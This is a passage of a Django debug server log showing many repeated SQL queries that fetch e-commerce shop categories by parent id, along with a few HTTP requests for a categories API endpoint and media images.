"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:13:54,020 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:13:54,022 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:13:54,024 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:13:54,027 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:13:54,029 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:13:54,032 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:13:54,034 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:13:54,037 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:13:54,039 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:13:54,041 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:13:54,044 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:13:54,046 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:13:54,049 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:13:54,051 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:13:54,053 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:13:54,057 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:13:54,059 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:13:54,061 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:13:54,063 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:13:54,066 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:13:54,068 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:13:54,071 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:13:54,073 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:13:54,075 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:13:54,078 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:13:54,080 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:13:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 09:13:54] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [18/Dec/2019 09:13:54] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [18/Dec/2019 09:15:08] "GET / HTTP/1.0" 302 0 [18/Dec/2019 09:21:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 09:21:46,238 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:21:46,245 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:21:46,249 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:21:46,251 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:21:46,255 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:21:46,257 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:21:46,259 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:21:46,261 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:21:46,264 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:21:46,267 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:21:46,269 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:21:46,272 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:21:46,274 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:21:46,276 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:21:46,280 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:21:46,282 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:21:46,284 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:21:46,287 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:21:46,289 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:21:46,293 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:21:46,295 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:21:46,298 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:21:46,300 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:21:46,303 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:21:46,305 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:21:46,309 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:21:46,311 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:21:46,314 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:21:46,316 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:21:46,319 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:21:46,322 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:21:46,325 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:21:46,328 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:21:46,330 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:21:46,332 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:21:46,336 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:21:46,338 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:21:46,341 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:21:46,343 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:21:46,346 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:21:46,348 utils 